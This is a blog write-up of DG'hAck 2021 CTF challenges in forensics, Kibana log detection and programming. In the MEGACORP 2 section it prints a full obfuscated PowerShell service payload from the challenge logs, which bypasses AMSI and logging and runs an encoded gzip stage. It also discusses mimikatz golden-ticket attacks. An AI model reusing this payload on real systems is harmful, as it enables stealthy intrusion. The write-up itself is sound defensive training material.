+++
title = "DGhAck 2021"
date = "2022-01-19"
author = "z0ne"
tags = ["DGA", "Blue team", "CTF"]
+++

# Introduction

In november, I participated in a CTF called DG'hAck (a pun with the agency who created the CTF (DGA) and the word hack.) 

**So what's the DGA?**

It's a french agency founded in 1961, who's responsible for project management, development and purchase of weapon systems for the French military. Ok but at first sight you wouldn't see a real connection with cybersecurity right ? Well the agency itself like many others have several branches within it's organization. One of them is of course related to the field and whose mission is to carry out studies, expertise and tests in the fields of electronic warfare, weapons systems, information systems, telecommunications, information security and electronic components. 

So when we're talking about the DGA, we're talking specifically about the **DGA-MI** (**DGA** + the name of the cyber branch a.k.a **M**aîtrise de l'**I**nformation (in english it would be information literacy, in the context of cybersecurity of course.))

If you want more info about what this agency does, you could go either on the english wiki page right [here](https://en.wikipedia.org/wiki/Direction_g%C3%A9n%C3%A9rale_de_l%27armement).
But to be honest the page doesn't really have a lot of infos, so I would reccommand to go on the french page and just from your web browser translate the page in english so you'll get a lot more infos from [there](https://fr.wikipedia.org/wiki/Direction_g%C3%A9n%C3%A9rale_de_l%27Armement).

Ok so I did 7 challenges in a lot of various topics including forensic, detection and programming.
But since this post will be the write-up for all of these challenges (therefore it will be pretty long to read), maybe you only want to see one of the topic. 
You have a choice right below, if you just want to read the all thing then keep scrolling but if you want to see a particular subject click on one of these topics :

- [Forensics](#forensics)
- [Detection](#detection)
- [Programming](#programming)

# Forensics

#### PCAP 101

The headline for this challenge was: *A suspicious TCP stream has been provided to us, can you find out what data is hidden in it?*

The file that was given to us is a .pcap, so it can be open with wireshark. We see a LOT of HTTP packets, so I go to the HTTP object lists to see things faster.

![object_list](/dghack2021_0.png)

As you can see above, a lot of elements tells us to take a look at this packet.
First the hostname is really different than what we saw on the others packets, second thing, the content type is not some regular text/html, the application/octet-stream could clearly state that an unknow type file has been transferred and finaly the name of the file, "zippassword" really give us an additional hint about where to look.

So when checking this packet precisely we see the data that has been received:

![packet](/dghack2021_1.png)

We can clearly saw that it's hexadecimal, so we use CyberChef to decode this string and look what we got:

![hexa_string](/dghack2021_2.png)

When we remove this hexadecimal layer with cyberchief, we get a base64 string that we can identify since it has some distinctive characters like + or /. The next step will be to decode this base64 string to see what we got again. So when we try this in CyberChef we have that:

![base64_string](/dghack2021_3.png)

Now we got a problem in sort of, the first string seems to be base64 again but the rest of the string seems to be binary with all of the chars represented in a weird way.

But we have an option in cyberchef to detect and potentially extract file from this weird string!

So we simply do that in cyberchief like this:

![extract_files](/dghack2021_4.png)

And BINGO! We got some part files, so when we download them and try to unzip them like this:

![unzip_files](/dghack2021_5.png)

There is another problem. Unfortunately we need a password and we don't have this password.
So we look again at the extracted string we got after decoding base64 and we can notice that as I said earlier we see the full strings like it was in two parts, with first a base64 looking and then some binary represented by strange chars. So if we just take this first part and decode it like this:

![decode_firstb64](/dghack2021_6.png)

Maybe it will be the password right? So we supply this to the zip password protected like that: 

![finally_unzip](/dghack2021_7.png)

And we got the flag!!!

If you want to reproduce this challenge or get the files you can check [here](https://gitlab.com/z0ne/DGhAck/-/tree/main/DGhAck2021/PCAP_101)


#### iDisk

The headline for this challenge was: *Some time ago, the company ECORP noticed an intrusion in its information system. The system administrator teams noticed that backups of the "pre_prod" database were made repeatedly (and without prior agreement) around midnight each day. After a long police investigation, a suspect (ex-employee of ECORP) was arrested with a computer. However, as the police are understaffed, we need your help to conduct a digital investigation on the seized machine. Are you willing to accept this mission?* 

Ok I have a thing to say, the file that I get from the challenge was too big so I can't give you that since gitlab is limiting hosting to 10gb and the file (even compressed) is about 12gb. But don't worry the other files that we need in this challenge will be on gitlab just [here](https://gitlab.com/z0ne/DGhAck/-/tree/main/DGhAck2021/iDisk), so now let's start!

Only one things comes to my mind since it's a forensic challenge and the file is really **HUGE**, I'll bet that there's already partitions and it's not some kind of raw file where we had to identify each files etc. So we launch autopsy, open a case  and check the filesystem box. My guess was correct since the tool identify two volume, `C:` and `D:`. We should search in strings for the term they used in the headline (`pre_prod`) in the `D:` volume to get more info about those backup, so we search like this: 

![search_pre_prod](/dghack2021_9.png)

When the search is done, we got some results!

![result_pre_prod](/dghack2021_10.png)

So what do we got ? Well we litteraly have the all script the attacker used to make those backups, it looks like this:

![script_backup](/dghack2021_11.png)

We can see multiple things, first thing, the script backup the database and stored it in the path `C:\Users\root\Documents\db_backup.bak`. The second thing is that the script will encrypt the dump with openssl after that it will compress the backup with 7z to finally download it in the path: `C:\Users\Skiddy\Music\jazz` but sadly all the files unencrypted are saved to an external drive (that we don't have of course) and the last part of the script is sadly the cleanup part that's wiping everything in the same path where the encrypted db was saved (this one: `C:\Users\Skiddy\Music\jazz`) so no trace of what this backup contain... right?

Well we maybe still have a chance to check what's inside but if we go step by step where could we possibly check for files? Well the `C:\Users\Skiddy\Music\jazz` path is the only who could have remaining of this file, so we go there and we see that:

![part_files](/dghack2021_12.png)

So we can clearly see that there are parts of the zip file since they finish with 001, 002 etc...

So we download all of these parts and try to figure out what to do with that.

They might be something we could do, First we list our part like this to check everything's there:

![ls_f](/dghack2021_13.png)

then, we just do the reverse process of the script so the first thing to do is to decompress this but how to do it since we only have parts of the file ? Well 7z carry this mission for us. If we give him the first part he will detect on it's own the other parts to rebuild the file, so if we do this:

![7z_d](/dghack2021_14.png)

We got an output who's looking like this:

![output_7z](/dghack2021_15.png)

And as we can see we have a complete file but still encrypted with a key so how to recover the unencrypted file ? Well since it's symmetric encryption, we really just have to get back on the part where the encryption process occurs, so we got the key from the script we discovered earlier but also the IV which is the initialization vector that is going to be used to provide the initial state in sort of to make the encryption works (and decryption also since it's symmetric). So if we do on the command line something like this:

![decrypt_db](/dghack2021_16.png)

After the decryption is completed, we have the original bakup but still the file isn't really readable so I'll call a program that I can use: `strings`, to get me all the strings that the program can find in the bak file. SO I do this:

![strings_bak](/dghack2021_17.png)

and after this we hit ctrl + shift + f to search for just DGA and BINGO!

![flag](/dghack2021_18.png)

We got our flag!

# Detection

#### MEGACORP

Okay so two things to know for this challenge. First thing, Unfortunately I didn't take screenshot when doing these challenges and when I tried to reconnect they seemed to have block my access since I already validated all the challenges (surely to limit the traffic I guess?). The second thing which is pretty cool and that I didn't know about, is that this challenge in the whole is pretty unique (I never saw that), because it's one big challenge divided in chapter in sort of. What I mean is that we're going to go for MEGACORP, but the real challenges are :
- MEGACORP 1
- MEGACORP 2
- MEGACORP 3

For each, there is different objectives, differents flags but the first sentence for the headline stay the sames and it is:

*MEGACORP, a company of vital importance, has suffered a computer attack.
Several agents have already tried in vain to identify the intrusion (initial infection, lateral movement, compromised machines), time is running out, but fortunately the company has provided us with access to their log collection systems based on Kibana (Username: dghack; Password: dghack2021).
We are counting on you to succeed where others have failed as soon as possible.
The format of the flag is: DGA{string}.*

So again thew things to mention, first there will be no easy things to search for a flag, what I mean is since we're dealing with a log collection systems, the creator of the challenges are smart enough to not let us just search for a flag like DGA{*} or things like that, what I mean is that it would still be this form to validate it: DGA{FLAG}, but the flag itself will be an info or a precise things to get from Kibana. Second thing as you noticed the all visual thing with screenshot was pretty essential for these challenges compared to other so I'll try to help you the best way I can. To begin the log collection systems based on Kibana is Elastic and when we're searching these logs it looks like this:

![elasticsearch](/dghack2021_8.png)

So from that image I'll try to explain basic features. The search bar you see on the top of the bar graphs is to filter with tags. For example you could search source.ip = 192.168.1.100, which will get us all the hits with this source.ip. But you could ask yourself ok but how to know what parameters I can use and to know for example tags that aren't available ? Well it's pretty easy, again you just have to look on the left of the picture, you can see that you have all the availables fields for you to query to know exactly what you can ask. The second parameter to set  to make a filter or a query (how you perceive it) (it's located on the right side of the search bar) is the date with a precise day, hour, minute and even a precise second if you want...
With all of this when the query is complete you'll see three things appeared or updated, the first one is on the top left of the bar graphs, it tells you how many hits you got with your query, in this picture they have 7,396 hits. The second thing is of course the timestamps to know exactly when those hits happened, in the picture you don't see hits in details but if you put your mouse over one of this bar it would tell you exactly how many hits you got in that precise time. The last thing that is what fill most of the space in this picture is exactly what we're going to dive in for these challenges and it's the list of hits themselves in details, with all parameters, their values etc...

Okay so let's go with the first sub-challenge!

##### MEGACORP 1

The rest of the headline for this challenge was: *Can you find the sha256 of the file that initiated the compromise in the domain?*

Ok so I'm so sorry but even in my primary write-up I didn't gave a lot of details so I'll try to tell you everything I remember, at some point of course I found where the cyber attack started, it was october, 15 around 2am if I'm correct. The initial compromising stage was easily visible since we saw one of the computer downloading a resume from an applicant (like many cyber attacks start today). This one (the resume) was crafted with malicious macros, so what happend next is pretty common, the attacker get remote access to the machine and from that goes into other parts of the network and of course he'll try to privesc. But that's for the other challenges, now we just need to get the sha256sum of the file that initiated the compromising and it's that hit that give me the FLAG:

Long story short, this is the infos we'll need to validate this:

```
File stream created:
RuleName: -
UtcTime: 2021-10-15 14:05:14.970
ProcessGuid: {4752ea04-8a9a-6169-8901-000000002800}
ProcessId: 3932
Image: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetFilename: C:\Users\uri.cato\Downloads\cv_stagiaire.docm
CreationUtcTime: 2021-10-15 14:05:13.594
Hash: MD5=511B26079FE3F4B48242F64BD514433C,SHA256=3F0A801DEBE411DBCA3B572796116B56B527F85823FA84B03223CB68161D07BF,IMPHASH=00000000000000000000000000000000
```

Ok so to be quite honest I didn't put you all the parameters of the hit since it was kinda huge so I just put you the most useful infos. As I said to you before this doesn't seem suspicious but it's only the first stage and furthermore the first hit when this file was downloaded on the computer. The real magic with remote control etc is on the next hits, this one is just to get the hash and know what has been downloaded. So as you can see it was indeed through a word file that the attack started. Since they asked for the SHA256, the flag for the MEGACORP 1 is : `DGA{3F0A801DEBE411DBCA3B572796116B56B527F85823FA84B03223CB68161D07BF}`

##### MEGACORP 2

For this one the rest of the headline was: *Can you find the name of the service that allowed a pivot to the machine DK2021002?*

Since I didn't put all the tags from the previous hits I'll give you more explanation here, the machine that initated the compromising (with the word file) in the domain was named `DK2021001`, but this time we want to understand how the attacker got into an another machine that is called `DK2021002`.

To do that I applied some basic filter, first and more obvious I searched with the tag **host.hostname** the machine called **DK2021002**, so I simply did a `host.hostname: DK2021002` to get all the hits involving this machine and then I found something!

I make the hit shorter (this one was also pretty huge) and it looks like this:

```
Service Name :  tAdOaSoAfpmBCIRD
Service File Name :  %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c  $bIb4=((''{''+''0}crip''+''t{1''+''}loc{2''+''}Logging'')-f''S'',''B'',''k'');If($PSVersionTable.PSVersion.Major -ge 3){ $on=[Collections.Generic.Dictionary[string,System.Object]]::new(); $z5W_6=((''{1}nabl{2}Scri{0}''+''{3}Blo''+''ckL''+''og''+''ging''+'''')-f''p'',''E'',''e'',''t''); $oxZlX=[Ref].Assembly.GetType(((''{1}ystem.{3}ana{2}emen''+''t.{4}uto''+''mation''+''.{''+''5''+''}t''+''i{0}s''+'''')-f''l'',''S'',''g'',''M'',''A'',''U'')); $lcna=((''{1}na{2}l{3}''+''S''+''c{''+''0}i{4}tBlockI''+''n{''+''5}ocation''+''Logg''+''ing'')-f''r'',''E'',''b'',''e'',''p'',''v''); $mdYw=$oxZlX.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); $hGip=[Ref].Assembly.GetType(((''{6}{1''+''}''+''st{''+''9''+''}m.''+''{2}an''+''a{4''+''}''+''{9''+''}m{9}nt.{8}{''+''5''+''}''+''t''+''{7''+''}m''+''ati{''+''7''+''}n.''+''{8}m''+''si{3}ti{0}''+''s'')-f''l'',''y'',''M'',''U'',''g'',''u'',''S'',''o'',''A'',''e'')); if ($hGip) { $hGip.GetField(((''am{2}''+''i''+''{3''+''}''+''{''+''1}i{0}''+''Faile{''+''4''+''}'')-f''t'',''n'',''s'',''I'',''d''),''NonPublic,Static'').SetValue($null,$true); }; If ($mdYw) { $pRt=$mdYw.GetValue($null); If($pRt[$bIb4]){ $pRt[$bIb4][$lcna]=0; $pRt[$bIb4][$z5W_6]=0; } $on.Add($lcna,0); $on.Add($z5W_6,0); $pRt[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$bIb4]=$on; } Else { [Ref].Assembly.GetType(((''S''+''y{1}tem.''+''{4}anagem''+''ent.A''+''utomatio''+''n.S''+''cri''+''{0}t{5}{3}oc''+''{2}'')-f''p'',''s'',''k'',''l'',''M'',''B'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOyNaWECA7VWbW/aSBD+Xqn/waqQMCrB5qV{1}EqnSrU0MNIGYmHcOnRZ7sbesvcReh9Be//vNGhzSS3KXO6mWSPZlZnb''+''2mWdmdpVGrqA8Upbfwnvl+9s3yuGzcYxDRS2sppdlpZDy0nGrENeVz4o6R5{1''+''}Nk4eYRovzczONYxKJ/bzSIgIlCQmXjJJELSl/KuOA''+''xOTkevmVuEL5rhT+qLQYX2J2ENuZ2A2Ic''+''oI{2}T+5dcRdLryrOhlGhFn//vV{2}an1QXlYvbFLNE''+''LTq7RJCw4jFWLCk/SvLAwW5D1GKXujFP+EpUxjSq1yrDKMEr0gNrd6RLRMC9pAhXOV4mJ{2}KNI3knaWQvohZhaMfcRZ4XkyQplpW5ND9fLH5T54ezb9JI0JBUOpEgMd84JL6jLkkqbRx5jNyQ1QK0HBHTyF+US{2}B2x9dELUQpY2Xlv5hRe2SbI/daJfWxEkjZI{2}6VIZpPb{1}nlXsrIXq/4jJsy/{2}X49hwA5H5I8FY5a4KJ9fEZ1hwX8m+e7RBwV7V5QjPlz4peVrpwNBY83sG0MIhTUlo8gK0UvjbDqPxaa9VcFRS3/uwLLM1HnHqLo4GfQl9wl+ngTEq9zOQmWdGINHcRDqmbk1V9L{2}Rkx''+''UgGS{2}UX64GLavGwQbwmYcTHQsIsmfFE7SKk4kHXSCnzSIxc''+''CGsCXkHESz87s4+cWuxEXRICfvs5ULWwghQhufQhLXb56XIOQkWT4SQpK3YKOeqWFYdgRryygqKEHrZQKng2LB7d7aZMUBcnIje3KP0dz8O5Jo8SEacuhBYwGDgb4lLMJCRlpU09Yuwc6ufnF58FxMSMQfaApTsICKxIIBwhCRODqxk5ShW''+''H{2}E64YSQEmaxoWAz7UCIOOZIxDPvEK77kaZ4Ne+pLbHJQHv''+''kJAXcYF2VlRGMBNUj{2}LDn2v9x4Wn32/pgxOURIzTN{1}buyETIVCsJVEPY''+''CUQRILgMOKeWjghHxs7EuN+k67pjaCb9psO''+''5SM1rTa2cKvC79hd3VqC52H{1}N7hXddM7JZ1{2}ujW37qnPeR6Xzxy5owawrnoCNNG7T7VjUbgGvogG/vTYUdMO6g9CFym28225kwTnW7bY2lrb8N{1}NNoTHdXrjeu6vgb4prTqr5HXC+n2/grGUFOvr4xOYugddvHFvFmOa9ZszNpawwpWY544H6dNTd''+''POPN''+''zs7hAyuFfv7{2}bVG''+''z5ou6HR{2}Lh2ZjbW6AIhM7oYWQa/nBoxsrUR9{2}3O7GrUCX0TGZZLyaw/{1}Ix+3zLQsPX1{1}nmm+drZeIIDYzy''+''q0dlmchPA3Nq2+5ea3''+''uh45BufbQG4FkfYvwEZ36y5wQpkmu+R8b7HkxpeGxwZIGPNblErmG4sm8H+YFjjaMR6E4yuZj{1}L06pTu4HaOh+3fNQHcewbfYySu+a3plYdedwbf+hNV9powj5pTbNvBxN5Z20Tyr/bdvPSnVW37vWnhqHfm{2}EN2bLmaWfDUyPaXvr2ne/1x59u7nu7JZw71LTRO6DLfEgjUa8{1}Cmlj+kHW1rdvCmn3A0GPePN''+''S3+j{2}OAkwAz5BS8hT2+KxdajzNqdSQ1WzV8KaxBFh0Fyh/eb5gBjjrmwxWUeA9rZvOrIHDju''+''ZX8+NSsqDYOnYfPKl8/MZeAkZFmwrVyTyRVDW7+u6Dl1Dv9cbWS''+''K9/mYm3+xUMF''+''WWXWePzN40y0yDNbpSVPXXQwUPCwEV7mWwXsINzl5DPYIKuS8REj2Dc/YYu/x{2}D2w4YgegVeHqc/mmyEgCBk7IrVIQsus+7uIFxno{1}49fy5lDrAvjn/R{1}vjmv/sPsqLunlA0BP1n9eeNQrf{2}EGY0wFSDpQ{1}xnZPyeeh+KQLY/CnEUI0mF1+OQb+zoVJz14{1}2W{1}4y9+OYnn2QsAAA{0}{0}'')-f''='',''t'',''i'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
Service type :  service in user mode
Type of service startup :  start on demand
Service Account :  LocalSystem
message : A service was installed on the system.
```
As you can see this script was used to get access to the machine, it's pretty hard to read with all the functions call + the base64 strings everywhere. I'm not sure exactly what the script is doing, but clearly some hints give me some help to conclude that this is a fileless malware, the attacker got the things done through a powershell script embedded in COMSPEC which is an environment variable used in Windows that points normally to the command line interpreter. I saw a similar code with %cCOMSPEC% and powershell on one of Kaspersky report (wrote in 2017) that was talking about Fileless attacks against enterprise networks (you can read the pdf [here](https://media.kaspersky.com/en/business-security/fileless-attacks-against-enterprise-networks.pdf)). So the script is maybe trying to get reverse shell we can see proof of that through the call of some code like `New-Object System.IO.MemoryStream` or also this `$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;` who lets you redirect input, output error so with that you could potentially send/receive command for some kind of remote execution! Last thing to note is the `$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;` which is not really relevant but I wanted to point out this to show you just how the guys goes far to hide their scripts and make themselves as stealthier as they can.
So yup finally just to close the hit analysis, we can see the service name on the first line of the hit, the flag is `DGA{tAdOaSoAfpmBCIRD}`

##### MEGACORP 3

The last challenge was really simple since we already made most of the searches so at this point I already identified the type of attack, where it started, how did they did it etc... But again we're not going to go too fast, let's first check the headline: *Can you find the process GUID of the program that was used to generate the golden ticket?*

So as you can see they're talking about golden ticket, obviously this was a golden ticket attack that was targeting precisely the DC. SO what is a golden ticket attack ? A Golden Ticket attack is a kind of cyberattack targeting the access control privileges of a Windows environment where Active Directory (AD) is in use. In a golden ticket attack, adversaries use Kerberos (authentication systems used by microsoft) tickets to take over the key distribution service of a legitimate user.
But what program do we use when doing a golden ticket attack ? Well there is a well know tool used by attacker when doing this type of attack and it's mimikatz! Why?  Well because it pulls out hashes out of memory and can gave us leverage since we can create kerberos ticket that would let us impersonate another user.
So since I already knew that program I just decided to search for it through the product tag like that `Product: mimikatz` and got hits! 
To end this I'll just do a quick side note. You can see the user in the hit below is `User: NT AUTHORITY\SYSTEM` and furthermore, the machine targeted for this attack was actually the DC (as you can see with this tag: `agent.hostname: DC`) so when the attacker generate through mimikatz the golden ticket he litteraly pwn the entire structure under the DC.
Below you can find a part of the tags included in the hit.

```
UtcTime: 2021-10-15 14:29:22.501
ProcessGuid: {0FEEC322-9042-6169-8900-000000001D00}
ProcessId: 3220
Image: C:\Users\Public\mimikatz.exe
FileVersion: 2.2.0.0
Description: mimikatz for Windows
Product: mimikatz
Company: gentilkiwi (Benjamin DELPY)
OriginalFileName: mimikatz.exe
CommandLine: .\mimikatz.exe
CurrentDirectory: C:\Users\Public\
User: NT AUTHORITY\SYSTEM
LogonGuid: {0FEEC322-8C65-6169-E703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 1
IntegrityLevel: System
Hashes: MD5=BB8BDB3E8C92E97E2F63626BC3B254C4,SHA256=912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9,IMPHASH=9528A0E91E28FBB88AD433FEABCA2456
ParentProcessGuid: {0FEEC322-902F-6169-8700-000000001D00}
ParentProcessId: 2980
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\system32\cmd.exe
agent.hostname: DC
```
So as you can see the processguid of mimikatz is right above so the flag is : `DGA{0FEEC322-9042-6169-8900-000000001D00}` 

#### Yet Another Ridiculous Acronym

This challenge has this headline: *Will you be able to write a signature that detects the correct binary from the extracted markers in the attached analysis?* When downloading the challenge it gave us a thousand binaries in a folder and a png that represent a screenshot from a r2 analysis.
The challenge is to create a signature to identify what is the real binary. When we open any binary and execute it we only have one string which is a random DGA{flag}, but we don't know which one is good so that's the next step, we just did that to know what the binaries contains.

But fortunately the screenshot of the analysis of the good file through r2 gives us some hint to what we need to check to get the good one. The screenshot look like this:

![r2](/dghack2021_19.png)

For the first output, we can check in the files if the stack is non executable, if it's false we're on the right way.
The second output, we can check in the files is to print out the first instructions, if we got `xor ebp, ebp` as a result, again we're on the right way.
The third output we can check in the files is if the md5 sum correspond to the one we retrieved from the hashed 20 bytes that start on this address: `0x0040404f`. Sadly the fourth and last output can't be read in totality so we need to do some bruteforce, but we can still read some part of the command. We use pox to print memory, and use @ to print at a certain address block it start with 0x0040[blur], but I might think that the first number is a 4 and the last is a f, so I might take a json file, create an "address list" from `0x0040400f` to `0x00404fff`.

So I made two version of my script. The first one look like this:

```python
import r2pipe, os, json

directory = "samples"

f = open("random.txt", "a")

l = list(range(10, 100))

o = [str(a) for a in l]

with open("madd.json") as myjson:
        json_data = json.load(myjson)
        
        for filename in os.listdir(directory):
            r2_directory = "samples/" + filename
    
            r = r2pipe.open(r2_directory)
    
            res = ["", "", ""]

            res[0] = r.cmd("i~nx")
            res[1] = r.cmd("pi 1")
            res[2] = r.cmd("ph md5 0x20 @ 0x0040404f")

            for i in range (len(res)):
                res[i] = res[i].rstrip("\n")

            hint = 0

            if res[0] == "nx       false":
                #print("[+] nx stack false!")
                hint += 1

                if res[1] == "xor ebp, ebp":
                    #print("[+] good first d instrusction!")    
                    hint += 1
                    
                    if res[2] == "f3ea40bcc61066261ea3a018560434e2":
                        #print("[+] md5 hash block valid!")
                        hint += 1

                        for i in range(0, 256):  
                            for j in range(0, 90):
                                str = r.cmd("pox " + o[j] + " @ " + json_data[i])
                                f.write(filename + "\n" + str + "\n")

                    else:
                        continue
                else:
                    continue            
            else:
                continue
        
    

f.close()		
```

So it checked the 3 requirements through r2pipe a module in python that makes the job easier since I just do the same instruction that you can see on the screenshot and for the fourth one I just use the json file with the memory addresses list to check every combination and put the output on a file. On the other hand I open the output file and just hit ctrl +f and search for "6369 7869 6369 7869 28b2 b2b2 b2b2 b2b2" (a.k.a the string showed in the screenshot provided by the challenge that tells us if it's the right binary) 

Just a quick side note but I tend to be as honest as possible, if you have a computer that doesnt have at least 4gb of memory, I wouldn't run the program since it's going to stream a lot of data on the file and if you try to open in a text editor for example I'm almost certain the editor could crash. If you want to be safe and don't make your computer crash, just run the second version of the script!

When it found the string after the ctrl+f search, I stop the script and you got this output at the end:

![output_file](/dghack2021_20.png)

Of course to be sure it's not a false positive we can check the result. The script told us it's the sample256 that got positive to our test, so we execute this  `pox 22 @ 0x004040bf~[0-10]~:1` in radare2:

![output_radare](/dghack2021_21.png)

And yup we got the good binary!

I also made the second version that is much cleaner and faster!:

```python
import r2pipe, os

def main():
	directory = "samples"

	f_str = "0x004040bf 6369 7869 6369 7869 28b2 b2b2 b2b2 b2b2 cixicixi(......."

	for filename in os.listdir(directory):
		r2_directory = "samples/" + filename
		
		r = r2pipe.open(r2_directory)
    
		res = ["", "", "", ""]
    
		res[0] = r.cmd("i~nx")
		res[1] = r.cmd("pi 1")
		res[2] = r.cmd("ph md5 0x20 @ 0x0040404f")
		res[3] = r.cmd("pox 22 @ 0x004040bf~[0-10]~:1")

		for i in range (len(res)):
			res[i] = res[i].rstrip("\n")

		hint = 0

		if res[0] == "nx       false":
			print("[+] nx stack false!")
			hint += 1
        
			if res[1] == "xor ebp, ebp":
				print("[+] good first d instrusction!")    
				hint += 1
	
				if res[2] == "f3ea40bcc61066261ea3a018560434e2":
					print("[+] md5 hash block valid!")
					hint += 1

					if res[3] == f_str:
						print("[+] found hex pattern!")
						hint += 1
					else:
						continue 
				else:
					continue
			else:
				continue
       

		if hint == 4:
			print("FOUND IT:" + filename)
			flag = os.system("./samples/sample256")
			break
main()		
```
When we execute the second one we got this, which is cleaner and more "human readable": 

![secondver_output](/dghack2021_22.png)

So yup we got the flag and we're sure it's this file !

If you want to reproduce the steps or get the files you can go [here](https://gitlab.com/z0ne/DGhAck/-/tree/main/DGhAck2021/Yet_Another_Ridiculous_Acronym).

# Programming

#### Secure FTP Over UDP 1 And An Half

This challenge was for me the toughest and also the one that took me the longest time to solve. Same as MEGACORP, this challenge was composed of sub-challenges but unfortunately I didn't have time to make the rest so I just did the first one and the half of the second one. To add problems, I didn't make screenshots and since it required a server side, if you launch it now, it won't work, so I can only show you the documentation and my script for the first one + half of the second one.

The challenge headline was: *Your company has purchased a new FTP server software. This one is a bit special and there is no client for Linux! Using the documentation provided below, implement a client that goes as far as establishing a session.* 

The documentation state as follows the rules to follow (I only put the part of the documentation I used to achive the first challenge I've done + the half of the second one, if you want the full doc, check the link at the end, if you want to jump the doc click [here](#postdoc)):

--------------------------------------
#### Secure FTP Over UDP: Documentation

#### General

The server listens on the UDP port 4445. It is able to process messages up to 2048 bytes. Beyond that, an error message
message will be returned.

Due to the peculiarities of UDP, it is possible that packets are ignored by the server, or that the content of the packet is altered in transit.

A guest account can be used for your tests:
- Username = `GUEST_USER
- Password = `GUEST_PASSWORD`.

The third and last flag is located in a sub-folder of `/opt/` on the server.

#### Structure of a package 

A package is composed of 4 sections:

#### Header

The header is composed of two bytes. 

The 14 most significant bits are the packet ID. 
The 2 least significant bits are the size in bytes of the `size' section.

#### Size

The size section has a variable length from 1 to 3 bytes. It defines the length of the `content` section in bytes.

#### Content

The content of the packet. This is specific to each packet.


#### CRC32

Checksum stored on 4 bytes allowing to detect a possible modification of the packet during the transit.

The algorithm used is the same as the one present in Java (`java.util.zip.CRC32`).

The sum is calculated with the concatenation of the header, size and content sections.

#### Protocol

The protocol is structured as **messages**. Each message has its own identifier and content. The content of each message will be detailed later in this document.

Each message you send may be answered by an `ErrorMessage` containing an error code. You must check that each message received is not an error message before processing it.

To communicate with this server, it is necessary to follow the following steps in order:

* Establishing a session:
    - Sending a `ConnectMessage`. This message must have the string `CONNECT` in its `data` attribute.
    - The server will respond to this message by sending a `ConnectReply` response containing your session ID and the first flag.
* Authentication:
    - Sending an `RsaKeyMessage` message with your session id as the `sessionId` argument.
    - The server will reply with the `RsaKeyReply` response containing its RSA public key (`servPubKey`). This key is encrypted with the XOR algorithm and the `ThisIsNotSoSecretPleaseChangeIt` key, and then encoded in Base64.

#### Serialization format

* Strings and 'simple' arrays are serialized in the following form:
    - 2 bytes containing the length of the string or array.
    - The string or array.   

#### String encoding

Strings are encoded in UTF-8.

#### Messages 

Here is an exhaustive list of the different messages. The attributes are listed **in their serialization order**.

#### RsaKeyMessage (ID : 78)
- sessionId : String
### ErrorMessage (ID : 1)
- error : String
### ConnectMessage (ID : 1921)
- data : String
--------------------------------------

#### POSTDOC

After giving you the short doc we'll show you how I apply the doc to craft the packets I sent. Here's a template that looks like this:

#### Structure of our ConnectMessage packet

#### 4 sections :

#### Header
1921 -> 11110000001 
1 -> 01
11110000001 + 01 -> 1111000000101 -> hex -> b"\1e\05"

#### Size
x = len("CONNECT") -> x = 2 + 7 -> hex -> 9 so b"\x09"

#### Content 
b"\x00\x07" + CONNECT (encode UTF-8)

#### CRC32
x =  hex(zlib.crc32(packet_cmsg) & 0xffffffff)
x = b"\xcf\x9d\xae\x67"


#### Structure of our RsaKeyMessage packet

#### 4 sections :

#### Header
78 -> 1001110
1 -> 01
1001110 + 01 -> 100111001 -> hex -> b"\01\39"

#### Size
x = len(sessionId) -> x = 2 + 36 -> hex -> 26 so b"\x26"

#### Content 
b"\x00\x24" + sessionId (encode UTF-8)

#### CRC32
x =  hex(zlib.crc32(packet_rkmsg) & 0xffffffff)
crc32 checksum value is unique to each session token


#### The script

So yup after showing you the part of the doc that were essential to solve what I did + the packets template, I'll share my script to get the flag of the first challenge + achieve half of the second one: 

```python
from base64 import b64decode, b64encode
from pwn import *

import zlib, re, code

from subprocess import PIPE, run

r = remote('secure-ftp.dghack.fr', 4445, typ="udp")

## Structure of our ConnectMessage
header_cmsg = b"\x1e\x05"
size_bytes_cmsg = b"\x09"
content_length_cmsg = b"\x00\x07"
content_s_cmsg = "CONNECT".encode(encoding="UTF-8", errors="strict")
packet_cmsg = header_cmsg + size_bytes_cmsg + content_length_cmsg  + content_s_cmsg
checksum_cmsg = b"\xcf\x9d\xae\x67"
packet_cmsg += checksum_cmsg

print("[*] ConnectMessage packet: " + str(packet_cmsg))

# Make a variable outside the func to hold the result
res = ""

with context.local(log_level='debug'):
    ## Send/reply for ConnectMessage 
    r.send(packet_cmsg)

    res = r.recv(2048)

    if b"\x4c\x2d" in res:
        print("[+] Received a ConnectReply packet!")

    print("[*] ConnectReply packet: " + str(res))
        
    if b"\x44\x47\x41" in res:
        flag = ""
            
        for i in range(43, 68):
            flag += chr(res[i])
            
        print("[+] Flag found in the packet!: " + str(flag))   
    else:
        print("[-] Didn't received a ConnectReply packet")
        r.close()


## Get the sessionId from the ConnectReply packet
sessionId = ""

for i in range(5, 41):
    sessionId += chr(res[i])

print("[*] sessionId of the ConnectReply packet: " + str(sessionId))

## Structure of our RsaKeyMessage
header_rkmsg = b"\x01\x39"
size_bytes_rkmsg = b"\x26"
content_length_rkmsg = b"\x00\x24"
content_s_rkmsg = sessionId.encode(encoding="UTF-8", errors="strict")
packet_rkmsg = header_rkmsg + size_bytes_rkmsg + content_length_rkmsg  + content_s_rkmsg

